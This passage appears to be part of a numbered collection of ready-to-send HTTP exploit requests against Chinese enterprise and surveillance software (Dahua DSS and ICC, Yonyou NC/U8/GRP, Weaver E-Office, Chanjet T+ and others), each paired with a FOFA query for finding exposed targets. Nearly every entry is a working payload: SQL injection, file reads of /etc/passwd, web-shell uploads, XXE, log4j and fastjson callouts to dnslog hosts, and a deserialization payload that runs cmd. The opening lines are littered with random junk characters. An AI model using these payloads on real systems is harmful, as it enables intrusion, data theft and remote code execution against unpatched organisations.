& h$ V, B+ r% s/ t7 P' FPOST /portal/services/itcBulletin?wsdl HTTP/1.1/ [" z" _- v% _7 p3 H
Host: x.x.x.x; l( P3 e0 t* p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ E9 z5 ?4 M# S9 Y7 I+ fConnection: close8 b- C5 X, z2 V( f2 j! m
Content-Length: 3457 `1 D: q$ b6 s" D% R" v& h' h' g4 \; v
Accept-Encoding: gzip8 s* i% y9 y; v- u4 [

; u6 M+ z7 T: ~; ]$ r  k<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>! d2 A+ g7 W6 Y0 e, D; `' e6 D
<s11:Body>
3 a+ p1 x$ r2 g. w  a& ~$ {    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
7 Q5 B! h: c( a      <netMarkings>
8 O& C; Z; p. a% `       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
( a- M/ _: ~. H6 b% B% V7 U      </netMarkings>
* ?% x2 y# \4 k+ b    </ns1:deleteBulletin>! B! P: u* y& J7 J& V
  </s11:Body>
$ _: H5 s7 l% x7 w/ Z0 x0 B0 ?</s11:Envelope>
6 ~/ ~) v" S6 [+ x/ n
) H/ m/ N  X' I0 I! T
7 R3 o) k: a1 a1 w, A% d6 T18. 大华 DSS 数字监控系统 user_edit.action 信息泄露$ ^. j; _' U* k; M7 i) n
FOFA:app="dahua-DSS"
2 L$ W( T, [- A! v" hGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
* K" J7 H: U% c  X4 xHost: your-ip
. [7 }$ t0 l2 z' n( n0 I: |% WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ q& d. ~. k" X7 NAccept-Encoding: gzip, deflate
8 D( E, F5 @) Y/ c4 \Accept: */*
7 U  Z1 e! x+ L$ u4 D/ M* eConnection: keep-alive
8 o+ W  V: w/ R# m3 s
- J. F6 E! ~' @9 q, v
- |' ]& {$ u/ @+ c
9 u' Y, t0 B% h  P! R19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
* l2 i9 W8 H6 P6 n( i2 UFOFA:app="dahua-DSS"
- A5 {5 ]& L# nGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1: a; H/ D: f/ R7 k
Host:2 d  E2 A% \( M( |: z
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% a) u- b6 s, Y1 `
Accept-Encoding: gzip, deflate
; P* w$ |9 F7 d- }. W2 WAccept: */*
3 S0 S4 l3 v' ]! I" l3 cConnection: keep-alive" d  r0 K- Y: C% o# t. ~
1 w' n& E. {7 t3 A4 e
; i" Z5 i" R8 T" y; Q
20. 大华ICC智能物联综合管理平台任意文件读取; a1 O/ D6 y* A& i4 t0 ~- {8 i
FOFA:body="*客户端会小于800*"
0 U/ ]: q$ w0 @0 C8 b3 }% MGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
+ \7 W" ^" Y8 U  \& A" sHost: x.x.x.x
7 `: v* |3 x3 \7 q0 E: e3 R& |User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ T; H2 @; ]" h/ S( |' g+ [1 RConnection: close
! |$ Z: n  g3 ^5 R' t, ~Accept: */*
& ~9 k" S3 C$ S' f+ a: xAccept-Language: en8 X& m) j9 X6 L- H3 \
Accept-Encoding: gzip( {0 y+ \# r4 N$ E1 @8 J4 ?6 E! i, c- N
3 q, n" D" d9 S& F0 x) c& ]; E
  [$ \9 {' e5 s5 m
21. 大华ICC智能物联综合管理平台random远程代码执行4 t% T% X; T! e3 T5 r. ]( K
FOFA:icon_hash="-1935899595"
2 B7 u' w8 O( o& C, h$ N  h6 F$ OPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1/ ~/ \5 J0 k! q
Host: x.x.x.x, s; ?+ \: n5 f( y4 U; |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 Y0 P9 O( {' h- o
Content-Length: 161: M+ x- B7 m- R- d4 G, [2 O- x
Accept-Encoding: gzip2 l- m* p1 n+ U3 K) I5 N3 c) ]
Connection: close0 ?; e3 i0 I$ M7 [; d* }+ J7 n
Content-Type: application/json;charset=utf-8
. H; O: h* p: R" _/ v9 X
: q0 ?3 P. u. G/ s" S4 C; b: S{, t! T$ S6 W# h( g: s+ b
"a":{6 f6 e. ?# H$ I" Z( d/ ]
   "@type":"com.alibaba.fastjson.JSONObject",
, \" R* ]8 L* W& @/ t    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
$ t3 C. l  @: S5 D2 F7 c  }""
0 Y/ A+ T& K# N* M. D}9 }; c1 G) z3 m
. L& Y) m/ D0 h" R

. \, K" O# v$ U% p22. 大华ICC智能物联综合管理平台 log4j远程代码执行
7 T4 T: j0 q+ L; i3 S0 wFOFA:icon_hash="-1935899595"
/ {  T) [, v( Y# q: k+ V! {, x# tPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
. E7 M/ A" G7 o2 c  ~  E$ QHost: your-ip
- K, U6 ^, L) M' _1 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" W+ p8 R( T; n; @
Content-Type: application/json;charset=utf-8: N: k; y. C0 b$ A/ y9 v/ X
3 Q$ E  Q( |* k+ K& `- T+ x
{
% s3 M1 V# G2 w9 ["loginName":"${jndi:ldap://dnslog}"* |/ B; X; x. H- |& V+ e( Y
}+ I) @' O3 I* q: p, G$ L/ u
5 q3 u" t: f" a' F6 ^% b

8 [) n6 E9 y! m7 o8 w) [
; w9 J; I3 i) m0 P. A. I23. 大华ICC智能物联综合管理平台 fastjson远程代码执行6 p) b& i9 S- X9 I5 o) J! d
FOFA:icon_hash="-1935899595"9 b: `) N. |% \
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1& p$ h% y  y0 K% t1 s: w0 ~
Host: your-ip3 E; u! r9 c. V4 q% `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" g& ]3 ?( s8 y8 c" o
Content-Type: application/json;charset=utf-8
8 {, ~6 Y5 G7 M& a/ Q0 Q) F9 [+ YAccept-Encoding: gzip
: y! V$ w6 M9 }. c; Z7 x$ h8 oConnection: close, U4 B+ [3 [  A% n
) n+ h# N3 M# L2 D- m0 [7 o" \3 G2 I5 }
{/ {; _, ?; M* N' ]- |
    "a":{
6 d# b; d% E3 J; j' G1 I        "@type":"com.alibaba.fastjson.JSONObject",
; x! a% _% t$ k3 f) I       {"@type":"java.net.URL","val":"http://DNSLOG"}( @% {. p: H) @: q5 y. z
        }""
+ X2 s- r. K4 k}- O  Z' q/ F% u# r: @; G! K. a: [  Z

2 @$ ^6 j. r/ A) r5 X
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633、NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet to the target; it executes a command that writes the specified string into the specified file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full packet
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
 }
}

Step 2: visit the following URL
